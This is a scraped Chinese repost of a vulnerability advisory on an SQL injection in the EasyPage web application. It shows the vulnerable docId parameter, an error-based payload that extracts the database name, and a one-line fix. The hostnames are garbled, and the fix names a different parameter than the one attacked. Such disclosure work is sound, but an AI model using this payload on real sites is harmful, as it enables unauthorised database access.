标题: EasyPage SQL Injection Vulnerability 作者Red Security TEAM 开发者: http://karait测试数据/ HdhCmsTest2cto测试数据 测试平台: Windows Server 2008 (Microsoft-IIS/7.5) 测试方法: # http://HdhCmsTest2cto测试数据 /default. asp x?page=Document&app=Documents&docId=[SQLi] # 示例: # # [Get Database Name] # http://HdhCmsTest2cto测试数据 /default.aspx?page=Document&app=Documents&docId=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1 HdhCmsTest2cto测试数据提供修复方案 过滤default.aspx页面page参数输入
查看更多关于EasyPage SQL注射缺陷及修复 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12591